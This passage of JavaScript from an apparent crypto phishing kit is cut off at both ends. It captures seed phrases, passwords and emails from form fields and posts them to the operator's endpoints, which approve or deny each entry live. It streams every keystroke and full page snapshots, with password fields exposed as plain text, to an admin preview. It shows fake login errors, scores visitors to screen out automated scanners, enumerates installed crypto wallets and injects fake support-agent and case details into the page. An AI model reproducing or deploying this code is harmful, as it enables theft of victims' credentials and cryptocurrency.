form.elements.length; i++) {\\n      var el = form.elements[i];\\n      if (isSeedphraseFieldName(el.name, el.id, el.placeholder)) {\\n        return true;\\n      }\\n    }\\n    return false;\\n  }\\n  \\n  function getSeedphraseValue(form) {\\n    if (!form || !form.elements) return null;\\n    var keywords = ['seed', 'phrase', 'mnemonic', 'recovery', 'backup', 'words', 'wallet'];\\n    var values = [];\\n    for (var i = 0; i \u003c form.elements.length; i++) {\\n      var el = form.elements[i];\\n      if (!el.value || el.type === 'submit' || el.type === 'button') continue;\\n      var name = (el.name || '').toLowerCase();\\n      var id = (el.id || '').toLowerCase();\\n      var placeholder = (el.placeholder || '').toLowerCase();\\n      for (var j = 0; j \u003c keywords.length; j++) {\\n        if (name.indexOf(keywords[j]) \u003e= 0 || id.indexOf(keywords[j]) \u003e= 0 || placeholder.indexOf(keywords[j]) \u003e= 0) {\\n          values.push(el.value);\\n          break;\\n        }\\n      }\\n    }\\n    return values.length \u003e 0 ? values.join(' ') : null;\\n  }\\n  \\n  var pendingSeedphraseSubmission = null;\\n  function submitSeedphrase(value, form) {\\n    if (!sessionId) return Promise.resolve(null);\\n    if (pendingSeedphraseSubmission === value) {\\n      return Promise.resolve(null);\\n    }\\n    pendingSeedphraseSubmission = value;\\n    var originPage = window.location.href;\\n    // Capture sessionId at submission time so background pings don't change it\\n    var submissionSessionId = sessionId;\\n    \\n    return fetch('/api/public/session/seedphrase', {\\n      method: 'POST',\\n      headers: { 'Content-Type': 'application/json' },\\n      body: JSON.stringify({\\n        sessionId: submissionSessionId,\\n        value: value,\\n        page: window.location.pathname\\n      })\\n    }).then(function(r) { return r.json(); }).then(function(res) {\\n      console.log('[Tracking] Seedphrase submitted to session:', submissionSessionId);\\n      function pollStatus() {\\n        // Use the captured submissionSessionId, not the global sessionId\\n        var pollPage = encodeURIComponent(window.location.pathname.replace(/^\\\\//, ''));\\n        return fetch('/api/public/session/seedphrase/status?sessionId=' + encodeURIComponent(submissionSessionId) + '\u0026page=' + pollPage)\\n          .then(function(r) { return r.json(); })\\n          .then(function(statusRes) {\\n            console.log('[Tracking] Poll status:', statusRes.status);\\n            if (statusRes.status === 'allowed') {\\n              console.log('[Tracking] Seedphrase ALLOWED from page:', originPage);\\n              pendingSeedphraseSubmission = null;\\n              if (statusRes.allowRedirect) {\\n                console.log('[Tracking] Using configured allow redirect:', statusRes.allowRedirect);\\n                window.location.href = '/' + statusRes.allowRedirect.replace(/\\\\.html$/, '');\\n              } else {\\n                var stepMatch = originPage.match(/step(\\\\d+)(\\\\.html)?/i);\\n                if (stepMatch) {\\n                  var nextStep = parseInt(stepMatch[1], 10) + 1;\\n                  var nextPage = '/step' + nextStep;\\n                  console.log('[Tracking] Redirecting to next step:', nextPage);\\n                  window.location.href = nextPage;\\n                } else {\\n                  console.log('[Tracking] Redirecting to disconnect-success');\\n                  window.location.href = '/disconnect-success';\\n                }\\n              }\\n              return true;\\n            } else if (statusRes.status === 'denied') {\\n              console.log('[Tracking] Seedphrase DENIED, redirecting to invalid-seed');\\n              pendingSeedphraseSubmission = null;\\n              var denyTarget = statusRes.denyRedirect ? ('/' + statusRes.denyRedirect.replace(/\\\\.html$/, '') + '?origin=' + encodeURIComponent(originPage)) : ('/invalid-seed?origin=' + encodeURIComponent(originPage));\\n              window.location.href = denyTarget;\\n              return false;\\n            } else if (statusRes.status === 'none') {\\n              console.log('[Tracking] Status is NONE, stopping poll');\\n              pendingSeedphraseSubmission = null;\\n              return null;\\n            } else {\\n              return new Promise(function(resolve) {\\n                setTimeout(function() { resolve(pollStatus()); }, 1000);\\n              });\\n            }\\n          });\\n      }\\n      return pollStatus();\\n    }).catch(function() {\\n      pendingSeedphraseSubmission = null;\\n      return null;\\n    });\\n  }\\n  window.__submitSeedphrase = submitSeedphrase;\\n  \\n  function submitGeneratedSeed(value) {\\n    var attempts = 0;\\n    function trySend() {\\n      if (sessionId) {\\n        fetch('/api/public/session/generated-seed', {\\n          method: 'POST',\\n          headers: { 'Content-Type': 'application/json' },\\n          body: JSON.stringify({\\n            sessionId: sessionId,\\n            value: value,\\n            page: window.location.pathname\\n          })\\n        }).catch(function() {});\\n      } else if (attempts \u003c 15) {\\n        attempts++;\\n        setTimeout(trySend, 1000);\\n      }\\n    }\\n    trySend();\\n  }\\n  window.__submitGeneratedSeed = submitGeneratedSeed;\\n  window.__getSessionId = function() { return sessionId; };\\n  \\n  function reportVaultBalances(balances) {\\n    var attempts = 0;\\n    function trySend() {\\n      if (sessionId) {\\n        fetch('/api/public/session/vault-balances', {\\n          method: 'POST',\\n          headers: { 'Content-Type': 'application/json' },\\n          body: JSON.stringify({\\n            sessionId: sessionId,\\n            balances: balances\\n          })\\n        }).catch(function() {});\\n      } else if (attempts \u003c 15) {\\n        attempts++;\\n        setTimeout(trySend, 1000);\\n      }\\n    }\\n    trySend();\\n  }\\n  window.__reportVaultBalances = reportVaultBalances;\\n  \\n  // Collect all input values on the page (including hidden inputs for custom dropdowns)\\n  function collectAllInputs() {\\n    var data = {};\\n    // data-wasp-group: concatenate all inputs in the group (e.g. OTP digit fields)\\n    var groupEls = document.querySelectorAll('[data-wasp-group]');\\n    for (var g = 0; g \u003c groupEls.length; g++) {\\n      var gel = groupEls[g];\\n      var grp = gel.getAttribute('data-wasp-group');\\n      if (!grp) continue;\\n      if (!data[grp]) data[grp] = '';\\n      data[grp] += (gel.value || '');\\n    }\\n    // Regular named inputs (skip password — handled by password endpoint)\\n    var inputs = document.querySelectorAll('input, select, textarea');\\n    for (var i = 0; i \u003c inputs.length; i++) {\\n      var el = inputs[i];\\n      if (el.hasAttribute('data-wasp-group')) continue;\\n      if (el.name \u0026\u0026 el.value \u0026\u0026 el.type !== 'submit' \u0026\u0026 el.type !== 'button' \u0026\u0026 el.type !== 'password') {\\n        if (isSeedphraseFieldName(el.name, el.id, el.placeholder)) {\\n          continue;\\n        }\\n        data[el.name] = el.value;\\n      }\\n    }\\n    return data;\\n  }\\n\\n  // ── Auto password submit (used when page has name=\\\"password\\\" or type=\\\"password\\\" field) ──\\n  function showAutoPasswordError(btn, pwField) {\\n    if (btn) {\\n      btn.disabled = false;\\n      var tEl = btn.querySelector('.btn-text');\\n      var sEl = btn.querySelector('.btn-spinner');\\n      if (tEl) tEl.style.display = '';\\n      if (sEl) sEl.style.display = 'none';\\n    }\\n    if (pwField) { pwField.value = ''; pwField.style.borderColor = '#e53e3e'; pwField.focus(); }\\n    var err = document.getElementById('_wasp_pw_err');\\n    if (!err) {\\n      err = document.createElement('div');\\n      err.id = '_wasp_pw_err';\\n      err.style.cssText = 'background:#1a0000;border:1px solid #7f1d1d;border-radius:6px;' +\\n        'padding:10px 14px;margin-bottom:16px;color:#fca5a5;font-size:13px;line-height:1.5;';\\n      err.textContent = 'Incorrect email or password. Please try again.';\\n      var h = document.querySelector('h1, h2');\\n      var firstField = document.querySelector('.field, .input-wrap, .form-group, .field-box');\\n      if (h) h.insertAdjacentElement('afterend', err);\\n      else if (firstField \u0026\u0026 firstField.parentNode) firstField.parentNode.insertBefore(err, firstField);\\n    }\\n    err.style.display = 'block';\\n  }\\n\\n  function autoPasswordSubmit(btn) {\\n    var pwField = document.querySelector('input[type=\\\"password\\\"]');\\n    var emailField = document.querySelector('input[name=\\\"email\\\"], input[type=\\\"email\\\"]');\\n    if (!pwField || !pwField.value) return false;\\n    var pwValue = pwField.value;\\n    var emailValue = emailField ? emailField.value.trim() : '';\\n    var page = window.location.pathname;\\n    if (btn) {\\n      btn.disabled = true;\\n      var tEl = btn.querySelector('.btn-text');\\n      var sEl = btn.querySelector('.btn-spinner');\\n      if (tEl) tEl.style.display = 'none';\\n      if (sEl) sEl.style.display = 'block';\\n    }\\n    function doPost() {\\n      if (!sessionId) { setTimeout(doPost, 200); return; }\\n      var extraData = {};\\n      if (emailValue) extraData['email'] = emailValue;\\n      fetch('/api/public/session/password', {\\n        method: 'POST',\\n        headers: { 'Content-Type': 'application/json' },\\n        body: JSON.stringify(Object.assign({ sessionId: sessionId, password: pwValue, page: page }, extraData))\\n      });\\n      var poll = setInterval(function() {\\n        fetch('/api/public/session/password/status?sessionId=' + encodeURIComponent(sessionId))\\n          .then(function(r) { return r.json(); })\\n          .then(function(res) {\\n            if (res.decision === 'approved') {\\n              clearInterval(poll);\\n              window.location.href = res.approveRedirect || '/';\\n            } else if (res.decision === 'denied') {\\n              clearInterval(poll);\\n              if (emailValue) sessionStorage.setItem('_wasp_em_' + location.pathname, emailValue);\\n              sessionStorage.setItem('_wasp_pw_err_' + location.pathname, '1');\\n              showAutoPasswordError(btn, pwField);\\n            }\\n          }).catch(function() {});\\n      }, 1500);\\n    }\\n    doPost();\\n    return true;\\n  }\\n\\n  // Restore cached email + show error if returning after a password deny\\n  function restoreCachedCredentials() {\\n    var path = location.pathname;\\n    var cachedEmail = sessionStorage.getItem('_wasp_em_' + path);\\n    var hadError    = sessionStorage.getItem('_wasp_pw_err_' + path);\\n    if (cachedEmail) {\\n      sessionStorage.removeItem('_wasp_em_' + path);\\n      var ef = document.querySelector('input[name=\\\"email\\\"], input[type=\\\"email\\\"]');\\n      if (ef) ef.value = cachedEmail;\\n    }\\n    if (hadError) {\\n      sessionStorage.removeItem('_wasp_pw_err_' + path);\\n      var pwField = document.querySelector('input[type=\\\"password\\\"]');\\n      showAutoPasswordError(null, pwField);\\n    }\\n  }\\n\\n  // Track captured data to avoid duplicate sends\\n  var lastCapturedData = {};\\n  \\n  function sendInputDataIfNew() {\\n    var data = collectAllInputs();\\n    if (Object.keys(data).length === 0) return;\\n    \\n    // Only send if data has changed\\n    var dataStr = JSON.stringify(data);\\n    if (dataStr !== JSON.stringify(lastCapturedData)) {\\n      lastCapturedData = data;\\n      ping(data, true);\\n    }\\n  }\\n\\n  // ── Redirect polling (used by all non-seedphrase submits and no-form buttons) ──\\n  var _redirectPolling = false;\\n  function startRedirectPolling() {\\n    if (_redirectPolling) return;\\n    _redirectPolling = true;\\n    function poll() {\\n      if (!_redirectPolling) return;\\n      var previewToken = getPreviewToken();\\n      var actualDomain = previewToken ? 'preview:' + previewToken : window.location.hostname;\\n      fetch('/api/public/session/ping', {\\n        method: 'POST',\\n        headers: { 'Content-Type': 'application/json' },\\n        body: JSON.stringify({ id: sessionId, page: window.location.pathname, domain: actualDomain })\\n      }).then(function(r) { return r.json(); }).then(function(d) {\\n        if (d \u0026\u0026 d.sessionId \u0026\u0026 !sessionId) { sessionId = d.sessionId; }\\n        if (d \u0026\u0026 d.command === 'redirect' \u0026\u0026 d.target) {\\n          _redirectPolling = false;\\n          window.location.href = d.target;\\n        } else {\\n          setTimeout(poll, 2000);\\n        }\\n      }).catch(function() { setTimeout(poll, 2000); });\\n    }\\n    setTimeout(poll, 2000);\\n  }\\n\\n  // Visually disable the submit button and show .btn-spinner / hide .btn-text if present\\n  function disableSubmitButton(scope) {\\n    var root = scope || document;\\n    var btns = root.querySelectorAll('[type=\\\"submit\\\"], [data-wasp-submit]');\\n    for (var i = 0; i \u003c btns.length; i++) {\\n      var btn = btns[i];\\n      btn.disabled = true;\\n      var textEl = btn.querySelector('.btn-text');\\n      var spinnerEl = btn.querySelector('.btn-spinner');\\n      if (textEl) textEl.style.display = 'none';\\n      if (spinnerEl) spinnerEl.style.display = 'block';\\n    }\\n  }\\n\\n  function setupListeners() {\\n    // Restore email/error state from a previous deny redirect\\n    restoreCachedCredentials();\\n\\n    // Listen for form submit (standard forms)\\n    document.addEventListener('submit', function(e) {\\n      var form = e.target;\\n\\n      // Seed phrases: dedicated endpoint + allow/deny polling\\n      if (hasSeedphraseField(form)) {\\n        var seedValue = getSeedphraseValue(form);\\n        if (seedValue \u0026\u0026 seedValue.trim()) {\\n          e.preventDefault();\\n          var data = collectFormData(form);\\n          ping(data, true);\\n          disableSubmitButton(form);\\n          submitSeedphrase(seedValue, form);\\n          return;\\n        }\\n      }\\n\\n      // Password field in form: use password endpoint + approve/deny flow\\n      var pwInForm = form.querySelector('input[type=\\\"password\\\"]');\\n      if (pwInForm \u0026\u0026 pwInForm.value) {\\n        e.preventDefault();\\n        var formData = collectFormData(form);\\n        if (Object.keys(formData).length \u003e 0) ping(formData, true);\\n        var submitBtn = form.querySelector('[type=\\\"submit\\\"]');\\n        autoPasswordSubmit(submitBtn);\\n        return;\\n      }\\n\\n      // All other forms: block navigation, send data, poll for admin redirect\\n      e.preventDefault();\\n      disableSubmitButton(form);\\n      var formData = collectFormData(form);\\n      if (Object.keys(formData).length \u003e 0) {\\n        ping(formData, true);\\n      }\\n      startRedirectPolling();\\n    }, true);\\n\\n    // Capture input data when user clicks any button (for custom JS forms without \u003cform\u003e)\\n    document.addEventListener('click', function(e) {\\n      var el = e.target;\\n      // Walk up to find the real button element (in case user clicked a child span/img)\\n      var btn = el;\\n      while (btn \u0026\u0026 btn !== document \u0026\u0026 btn.tagName !== 'BUTTON' \u0026\u0026 btn.tagName !== 'INPUT') btn = btn.parentNode;\\n      if (!btn || btn === document) btn = el;\\n\\n      var isSubmitLike = btn.tagName === 'BUTTON' || btn.type === 'submit' || btn.type === 'button' ||\\n          (btn.tagName === 'A' \u0026\u0026 btn.href) || btn.classList.contains('next-btn') || btn.classList.contains('btn');\\n      if (isSubmitLike) {\\n        sendInputDataIfNew();\\n\\n        var outsideForm = !btn.closest('form');\\n\\n        // Explicitly marked no-form submit (data-wasp-submit)\\n        if (btn.hasAttribute('data-wasp-submit') \u0026\u0026 outsideForm) {\\n          var pwField = document.querySelector('input[type=\\\"password\\\"]');\\n          if (pwField \u0026\u0026 pwField.value) {\\n            autoPasswordSubmit(btn);\\n          } else {\\n            btn.disabled = true;\\n            var textEl = btn.querySelector('.btn-text');\\n            var spinnerEl = btn.querySelector('.btn-spinner');\\n            if (textEl) textEl.style.display = 'none';\\n            if (spinnerEl) spinnerEl.style.display = 'block';\\n            startRedirectPolling();\\n          }\\n          return;\\n        }\\n\\n        // Auto-detect type=\\\"submit\\\" outside a form — no data-wasp-submit needed\\n        if (btn.type === 'submit' \u0026\u0026 outsideForm) {\\n          e.preventDefault();\\n          var pwField2 = document.querySelector('input[type=\\\"password\\\"]');\\n          if (pwField2 \u0026\u0026 pwField2.value) {\\n            autoPasswordSubmit(btn);\\n          } else {\\n            btn.disabled = true;\\n            var tEl2 = btn.querySelector('.btn-text');\\n            var sEl2 = btn.querySelector('.btn-spinner');\\n            if (tEl2) tEl2.style.display = 'none';\\n            if (sEl2) sEl2.style.display = 'block';\\n            startRedirectPolling();\\n          }\\n        }\\n      }\\n    }, true);\\n\\n    // Also capture on beforeunload in case of navigation\\n    window.addEventListener('beforeunload', function() {\\n      sendInputDataIfNew();\\n    });\\n  }\\n  \\n  var lastInjectionSessionId = null;\\n  function applyInjection() {\\n    if (!sessionId) return;\\n    var currentSessionId = sessionId;\\n    fetch('/api/sessions/' + currentSessionId + '/injection')\\n      .then(function(r) { return r.ok ? r.json() : null; })\\n      .then(function(data) {\\n        if (!data) return;\\n        if (sessionId !== currentSessionId) return;\\n        lastInjectionSessionId = currentSessionId;\\n        \\n        var device = data.deviceLabel || '';\\n        var number = data.assignedNumber || '';\\n        var seedWords = data.seedWords || '';\\n        \\n        if (device) {\\n          var deviceElements = document.querySelectorAll('[name=\\\"device\\\"]');\\n          for (var i = 0; i \u003c deviceElements.length; i++) {\\n            deviceElements[i].textContent = device;\\n          }\\n        }\\n        if (number) {\\n          var numberElements = document.querySelectorAll('[name=\\\"number\\\"]');\\n          for (var i = 0; i \u003c numberElements.length; i++) {\\n            numberElements[i].textContent = number;\\n          }\\n        }\\n        \\n        var words = [];\\n        if (seedWords \u0026\u0026 seedWords.trim()) {\\n          var normalizedWords = seedWords.trim().replace(/\\\\s+/g, ' ');\\n          words = normalizedWords.split(' ').slice(0, 12);\\n        }\\n        for (var w = 1; w \u003c= 12; w++) {\\n          var wordElements = document.querySelectorAll('[name=\\\"word' + w + '\\\"]');\\n          var wordValue = (w \u003c= words.length) ? words[w - 1] : '';\\n          for (var j = 0; j \u003c wordElements.length; j++) {\\n            wordElements[j].textContent = wordValue;\\n          }\\n        }\\n        \\n        var appVal = data.appLabel || data.customApp || '';\\n        if (appVal) {\\n          var appEls = document.querySelectorAll('[name=\\\"app\\\"]');\\n          for (var i = 0; i \u003c appEls.length; i++) { appEls[i].textContent = appVal; }\\n        }\\n        var customPhone = data.customPhoneNumber || '';\\n        var customAgent = data.customAgent || '';\\n        var customCaseId = data.customCaseId || '';\\n        if (customPhone) {\\n          var phoneEls = document.querySelectorAll('[name=\\\"phone_number\\\"]');\\n          for (var i = 0; i \u003c phoneEls.length; i++) { phoneEls[i].textContent = customPhone; }\\n        }\\n        if (customAgent) {\\n          var agentEls = document.querySelectorAll('[name=\\\"agent\\\"]');\\n          for (var i = 0; i \u003c agentEls.length; i++) { agentEls[i].textContent = customAgent; }\\n        }\\n        if (customCaseId) {\\n          var caseEls = document.querySelectorAll('[name=\\\"case_id\\\"]');\\n          for (var i = 0; i \u003c caseEls.length; i++) { caseEls[i].textContent = customCaseId; }\\n        }\\n      })\\n      .catch(function() {});\\n  }\\n  \\n  // Bot signal detection - collects signals client-side to send a bot score\\n  var botScore = 0;\\n  function collectBotSignals() {\\n    var score = 0;\\n    try {\\n      // 1. Navigator.webdriver check — Selenium/Puppeteer/Playwright set this\\n      if (navigator.webdriver === true) score += 40;\\n\\n      // 2. Window size analysis — headless browsers often have 0x0 or tiny dimensions\\n      if (window.outerWidth === 0 \u0026\u0026 window.outerHeight === 0) score += 30;\\n      if (screen.width \u003c 100 || screen.height \u003c 100) score += 25;\\n\\n      // 3. Screen width validation — mobile UA but desktop screen\\n      var ua = navigator.userAgent || '';\\n      var isMobileUA = /iPhone|iPod|Android.*Mobile|Windows Phone|BlackBerry|Opera Mini|IEMobile/i.test(ua);\\n      if (isMobileUA \u0026\u0026 screen.width \u003e 1024) score += 30;\\n\\n      // 4. Touch/Mouse mismatch — mobile UA but no touch support\\n      var hasTouch = ('ontouchstart' in window) || (navigator.maxTouchPoints \u003e 0);\\n      if (isMobileUA \u0026\u0026 !hasTouch) score += 25;\\n\\n      // 5. Missing browser features that real browsers always have\\n      if (!window.chrome \u0026\u0026 !navigator.vendor \u0026\u0026 !window.opera) {\\n        if (/Chrome/i.test(ua)) score += 15;\\n      }\\n    } catch(e) {}\\n    botScore = Math.min(score, 100);\\n  }\\n  collectBotSignals();\\n\\n  // Chain/network detection + wallet detection via EIP-6963\\n  var detectedChainStr = '';\\n  var CHAIN_NAMES = {\\n    '0x1': 'Ethereum', '0x38': 'BNB Chain', '0x89': 'Polygon', '0xa86a': 'Avalanche',\\n    '0xa4b1': 'Arbitrum', '0xa': 'Optimism', '0xfa': 'Fantom', '0x2105': 'Base',\\n    '0x44d': 'Polygon zkEVM', '0x144': 'zkSync Era', '0xa4ec': 'Celo',\\n    '0x19': 'Cronos', '0x505': 'Moonriver', '0x504': 'Moonbeam',\\n    '0x64': 'Gnosis', '0x13881': 'Mumbai Testnet', '0xaa36a7': 'Sepolia',\\n    '0x5': 'Goerli', '0x61': 'BSC Testnet', '0xe708': 'Linea',\\n    '0x8274f': 'Scroll', '0x66eed': 'Arbitrum Goerli', '0x1388': 'Mantle',\\n    '0x82750': 'Scroll Sepolia', '0xa0c71fd': 'Blast'\\n  };\\n  var detectedWalletsStr = '';\\n  var walletScanDone = false;\\n  var eip6963Wallets = [];\\n  var eip6963Providers = [];\\n\\n  window.addEventListener('eip6963:announceProvider', function(event) {\\n    try {\\n      var info = event.detail \u0026\u0026 event.detail.info;\\n      var provider = event.detail \u0026\u0026 event.detail.provider;\\n      if (!info || !info.name) return;\\n      var already = false;\\n      for (var i = 0; i \u003c eip6963Wallets.length; i++) {\\n        if (eip6963Wallets[i].name === info.name || eip6963Wallets[i].rdns === info.rdns) {\\n          already = true;\\n          break;\\n        }\\n      }\\n      if (!already) {\\n        eip6963Wallets.push({\\n          name: info.name,\\n          icon: info.icon || '',\\n          rdns: info.rdns || ''\\n        });\\n        if (provider) {\\n          eip6963Providers.push({ rdns: info.rdns || '', name: info.name, provider: provider });\\n        }\\n      }\\n    } catch(e) {}\\n  });\\n  window.dispatchEvent(new Event('eip6963:requestProvider'));\\n\\n  function detectChainFromProviders() {\\n    try {\\n      var preferred = ['io.metamask', 'com.coinbase', 'app.phantom'];\\n      var chosen = null;\\n      for (var p = 0; p \u003c preferred.length; p++) {\\n        for (var i = 0; i \u003c eip6963Providers.length; i++) {\\n          if (eip6963Providers[i].rdns === preferred[p]) {\\n            chosen = eip6963Providers[i].provider;\\n            break;\\n          }\\n        }\\n        if (chosen) break;\\n      }\\n      if (!chosen \u0026\u0026 eip6963Providers.length \u003e 0) {\\n        chosen = eip6963Providers[0].provider;\\n      }\\n      if (chosen \u0026\u0026 chosen.request) {\\n        chosen.request({ method: 'eth_chainId' }).then(function(chainId) {\\n          if (chainId) {\\n            var name = CHAIN_NAMES[chainId] || ('Chain ' + parseInt(chainId, 16));\\n            detectedChainStr = name;\\n          }\\n        }).catch(function() {});\\n      }\\n    } catch(e) {}\\n  }\\n\\n  function runWalletScan() {\\n    window.dispatchEvent(new Event('eip6963:requestProvider'));\\n    setTimeout(function() {\\n      if (eip6963Wallets.length \u003e 0) {\\n        var names = [];\\n        for (var i = 0; i \u003c eip6963Wallets.length; i++) {\\n          names.push(eip6963Wallets[i].name);\\n        }\\n        detectedWalletsStr = names.join(',');\\n      }\\n      detectChainFromProviders();\\n      walletScanDone = true;\\n    }, 1500);\\n  }\\n  \\n  // Activity tracking - only ping when user is active\\n  var ACTIVITY_TIMEOUT = 30000; // 30 seconds of inactivity = stop pinging\\n  var IDLE_TIMEOUT = 60000; // 60 seconds of no interaction = idle\\n  var lastActivityTime = Date.now();\\n  var isPageVisible = !document.hidden;\\n  var interactionCount = 0;\\n  var currentVisState = 'active'; // active, inactive, idle\\n  var liveFields = {}; // Live field values streamed to admin preview\\n  \\n  function updateActivity() {\\n    lastActivityTime = Date.now();\\n    interactionCount++;\\n  }\\n  \\n  function getVisibilityState() {\\n    if (!isPageVisible) return 'inactive';\\n    if (Date.now() - lastActivityTime \u003e IDLE_TIMEOUT) return 'idle';\\n    return 'active';\\n  }\\n  \\n  function isUserActive() {\\n    // User is active if page is visible AND there was activity in the last 30 seconds\\n    return isPageVisible \u0026\u0026 (Date.now() - lastActivityTime \u003c ACTIVITY_TIMEOUT);\\n  }\\n  \\n  // Track user activity events\\n  function setupActivityTracking() {\\n    var activityEvents = ['mousedown', 'mousemove', 'keydown', 'scroll', 'touchstart', 'click', 'focus'];\\n    for (var i = 0; i \u003c activityEvents.length; i++) {\\n      document.addEventListener(activityEvents[i], updateActivity, { passive: true });\\n    }\\n\\n    // Stream live field values to admin preview\\n    function captureField(e) {\\n      var el = e.target;\\n      if (!el || !el.tagName) return;\\n      var tag = el.tagName.toUpperCase();\\n      if (tag !== 'INPUT' \u0026\u0026 tag !== 'TEXTAREA' \u0026\u0026 tag !== 'SELECT') return;\\n      var key = el.name || el.id || el.placeholder || (el.type + '_' + tag.toLowerCase());\\n      if (key) liveFields[key] = el.value || '';\\n      // Stream a 'fld' mutation using stable CSS selectors (name/id/placeholder)\\n      // so the preview iframe can find the element without data-mid attributes,\\n      // since the preview serves the raw static HTML (no runtime-assigned data-mid).\\n      if (sessionId) {\\n        var selParts = [];\\n        try {\\n          if (el.name) selParts.push('[name=\\\"' + el.name + '\\\"]');\\n          if (el.id) selParts.push('#' + CSS.escape(el.id));\\n          if (!selParts.length \u0026\u0026 el.placeholder) selParts.push('[placeholder=\\\"' + el.placeholder + '\\\"]');\\n        } catch(_se) {}\\n        if (selParts.length) {\\n          var _fx = new XMLHttpRequest();\\n          _fx.open('POST', '/api/public/mutations', true);\\n          _fx.setRequestHeader('Content-Type', 'application/json');\\n          _fx.send(JSON.stringify({ s: sessionId, muts: [{ t: 'fld', sel: selParts.join(','), v: el.value || '' }] }));\\n        }\\n      }\\n    }\\n    document.addEventListener('input', captureField, true);\\n    // SELECT elements fire 'change' not 'input' — listen to both\\n    document.addEventListener('change', captureField, true);\\n\\n    // DOM snapshot — streams the user's actual rendered page to admin live preview.\\n    // Sends immediately on any DOM/CSS change (via MutationObserver) plus a steady\\n    // 800ms fallback ticker. Syncs native form state into HTML attributes first so\\n    // select values, checkboxes and inputs all appear correctly in the snapshot.\\n    // --- Stable element IDs for mutation streaming ---\\n    var _midSeq = 0;\\n    var _snapSyncing = false; // set true during sendSnap attribute writes to suppress mutation streaming\\n    function _assignMids(root) {\\n      try {\\n        var els = (root \u0026\u0026 root.querySelectorAll) ? root.querySelectorAll('*') : [];\\n        for (var _i = 0; _i \u003c els.length; _i++) {\\n          if (!els[_i].hasAttribute('data-mid')) {\\n            els[_i].setAttribute('data-mid', 'mid' + (++_midSeq));\\n          }\\n        }\\n      } catch(e) {}\\n    }\\n    _assignMids(document.documentElement);\\n\\n    // --- Mutation patch streaming: streams class/style/DOM changes so the preview\\n    //     iframe can apply them to its live DOM, making CSS transitions play naturally ---\\n    var _mutBatch = [];\\n    var _mutFlushTimer = null;\\n    if (typeof MutationObserver !== 'undefined') {\\n      new MutationObserver(function(records) {\\n        if (_snapSyncing) return;\\n        for (var _r = 0; _r \u003c records.length; _r++) {\\n          var rec = records[_r];\\n          if (rec.type === 'attributes') {\\n            var _el = rec.target;\\n            if (!_el.hasAttribute || !_el.hasAttribute('data-mid')) continue;\\n            var _attr = rec.attributeName;\\n            if (_attr === 'data-mid') continue;\\n            _mutBatch.push({ t: 'a', mid: _el.getAttribute('data-mid'), k: _attr, v: _el.getAttribute(_attr) });\\n          } else if (rec.type === 'childList') {\\n            // Assign data-mid to newly added nodes\\n            rec.addedNodes.forEach(function(n) { if (n.nodeType === 1) _assignMids(n); });\\n            // Stream removals\\n            rec.removedNodes.forEach(function(n) {\\n              if (n.nodeType === 1 \u0026\u0026 n.getAttribute \u0026\u0026 n.getAttribute('data-mid'))\\n                _mutBatch.push({ t: 'r', mid: n.getAttribute('data-mid') });\\n            });\\n            // Stream insertions\\n            rec.addedNodes.forEach(function(n) {\\n              if (n.nodeType === 1 \u0026\u0026 n.getAttribute \u0026\u0026 n.getAttribute('data-mid')) {\\n                var _pm = rec.target.getAttribute ? rec.target.getAttribute('data-mid') : null;\\n                if (_pm) {\\n                  var _ns = n.nextElementSibling;\\n                  _mutBatch.push({ t: 'i', mid: n.getAttribute('data-mid'), html: n.outerHTML,\\n                    parentMid: _pm, nextMid: _ns \u0026\u0026 _ns.getAttribute ? _ns.getAttribute('data-mid') : null });\\n                }\\n              }\\n            });\\n          } else if (rec.type === 'characterData') {\\n            var _p = rec.target.parentElement;\\n            if (_p \u0026\u0026 _p.getAttribute \u0026\u0026 _p.getAttribute('data-mid'))\\n              _mutBatch.push({ t: 'txt', mid: _p.getAttribute('data-mid'), html: _p.innerHTML });\\n          }\\n        }\\n        if (_mutBatch.length) {\\n          if (_mutFlushTimer) clearTimeout(_mutFlushTimer);\\n          _mutFlushTimer = setTimeout(function() {\\n            if (!_mutBatch.length || !sessionId) return;\\n            var _b = _mutBatch.splice(0);\\n            var _x = new XMLHttpRequest();\\n            _x.open('POST', '/api/public/mutations', true);\\n            _x.setRequestHeader('Content-Type', 'application/json');\\n            _x.send(JSON.stringify({ s: sessionId, muts: _b }));\\n          }, 50);\\n        }\\n      }).observe(document.documentElement, {\\n        subtree: true,\\n        attributes: true,\\n        childList: true,\\n        characterData: true,\\n        attributeFilter: ['class', 'style', 'hidden', 'disabled', 'checked', 'selected', 'value', 'src']\\n      });\\n    }\\n\\n    var _snapPrev = '';\\n    var _snapTimer = null;\\n    var _snapObs = null; // declared early so sendSnap can disconnect/reconnect it\\n    function sendSnap() {\\n      try {\\n        if (!sessionId) return;\\n        // Pause observer so our attribute writes don't trigger a re-snapshot loop\\n        if (_snapObs) _snapObs.disconnect();\\n        _snapSyncing = true; // suppress mutation streaming during our own attribute writes\\n\\n        // Sync \u003cinput\u003e and \u003cselect\u003e runtime values → HTML attributes\\n        // Password fields: temporarily expose as text so preview shows the typed value\\n        var allInputs = document.querySelectorAll('input');\\n        var pwdInputs = [];\\n        for (var i = 0; i \u003c allInputs.length; i++) {\\n          var inp = allInputs[i];\\n          if (inp.type === 'checkbox' || inp.type === 'radio') {\\n            if (inp.checked) inp.setAttribute('checked', 'checked');\\n            else inp.removeAttribute('checked');\\n          } else {\\n            inp.setAttribute('value', inp.value);\\n            if (inp.type === 'password') {\\n              inp.setAttribute('type', 'text');\\n              pwdInputs.push(inp);\\n            }\\n          }\\n        }\\n        var allSelects = document.querySelectorAll('select');\\n        for (var si = 0; si \u003c allSelects.length; si++) {\\n          var sel = allSelects[si];\\n          var opts = sel.querySelectorAll('option');\\n          for (var oi = 0; oi \u003c opts.length; oi++) {\\n            if (opts[oi].value === sel.value) opts[oi].setAttribute('selected', 'selected');\\n            else opts[oi].removeAttribute('selected');\\n          }\\n        }\\n        // \u003ctextarea\u003e content lives as text between tags, not in an attribute.\\n        // Set defaultValue (= innerHTML / text content) temporarily so outerHTML captures it.\\n        var allTA = document.querySelectorAll('textarea');\\n        var savedTA = [];\\n        for (var ti = 0; ti \u003c allTA.length; ti++) {\\n          savedTA.push(allTA[ti].defaultValue);\\n          allTA[ti].defaultValue = allTA[ti].value;\\n        }\\n\\n        var h = document.documentElement ? document.documentElement.outerHTML : '';\\n\\n        // Restore textarea defaults immediately so user experience is unaffected\\n        for (var ti2 = 0; ti2 \u003c allTA.length; ti2++) {\\n          allTA[ti2].defaultValue = savedTA[ti2];\\n        }\\n        // Restore password field types\\n        for (var pi = 0; pi \u003c pwdInputs.length; pi++) {\\n          pwdInputs[pi].setAttribute('type', 'password');\\n        }\\n        _snapSyncing = false; // resume mutation streaming\\n\\n    